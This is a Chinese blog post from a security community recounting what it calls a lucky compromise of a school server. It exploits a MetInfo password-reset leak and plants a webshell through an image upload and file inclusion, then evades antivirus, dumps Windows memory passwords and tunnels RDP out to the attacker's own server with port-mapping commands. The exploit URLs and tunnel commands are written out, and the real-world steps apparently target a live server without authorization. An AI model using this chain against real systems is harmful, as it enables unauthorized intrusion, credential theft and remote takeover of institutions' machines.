记一次运气拿下某校一台服务器

字节脉搏实验室

共 2828字,需浏览 6分钟

 ·

2021-05-09 04:58

文章源自【字节脉搏社区】-字节脉搏实验室

作者-樱宁i

扫描下方二维码进入社区


(打点)重置后台密码---metinfo信息泄露 

自己搭建环境复现:

1、下载MetInfo 5.2.1到phpStudy的WWW目录下,开启phpStudy(注意php的版本问题,最好使用php5);



2、选择一个搭建metinfo可以ping通的机器,并在该机器上进行监听(kail进行监听)


3、在burp中构造如下请求:

注意:用户或者邮箱必须要存在,邮箱不知道可以直接写用户名(admin),前台文章发表出可以看见有admin用户


4、此时kail监听收到信息


5、此时访问网址,便可直接修改密码

http://127.0.0.1:8081/admin/admin/getpassword.php?p=6734pBcR5lhEk5um0stWx9YFD7AxylrcV8NjCThNte%2B9UbYjPD2CC0HlpGLC8IPL2PC2wvmcHPSd5Fhdj4et%2B0Nduw



6、修改密码即可


(webshell)后台上传图片,文件包含读取,webshell

后来才发现 5.1.7的版本存在文件包含,而5.2.6版本存在文件覆盖

上传图片马,利用文件包含漏洞



选择系统设置,

坑点(太坑了,搞了大半天,呜呜呜)


因为环境是本地搭建的,和当时实战的环境有很大的区别,所以要上传一个png的图片马

且要求:

1、只带有png的标志位的

小tip:将文件后缀改为txt,然后在加上一句话木马

666.png

  • 上传之后进行修改名称为666.php

  • 访问路径即可:http://127.0.0.1:8081//index.php?index=a&skin=default/../&dataoptimize_html=/../../upload/file/666.png

上传exe(实战环境中)



1、拿到webshel之后,此时进行命令执行  查看用户权限,权限还是比较高的。(还查了版本信息)


2、进行监听

      新增一个监听器

    

    下载之后上传,发现会被360给杀掉,所以想着免杀


免杀,上传,执行,上线


1、免杀生成

2、接着在文件列表中找到相应的文件下载

3、放入到网站中,发现没有被杀,并成功执行命令,上线


成功获取到账号密码步骤如下


1、在三角尖的下拉框中选择“获取windows内存密码”

2、点击实时输出,便可查看相应的执行结果

内网穿透,利用密码登录(端口映射:将3389端口映射到本地,使其可以直接远程连接)


1、将端口映射工具上传到网站上

2、首先在服务器上建立监听,等待连接

ok.exe -listen 6661 3624

3、开始在菜刀上执行映射命令

ok.exe -remote 自己服务器ip 3624 127.0.0.1 3389

4、在自己服务器上远程桌面连接 127.0.0.1:6666 输入上面获得的账号密码即可

错误之处还望各位师傅帮忙指正,谢谢


要你有技术有想法要分享给更多的朋友,就可以参与到我们的投稿计划当中哦~感兴趣的朋友公众号首页菜单栏点击【商务合作-我要投稿】即可。期待大家的参与~

记得扫码

关注我们


浏览 48
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报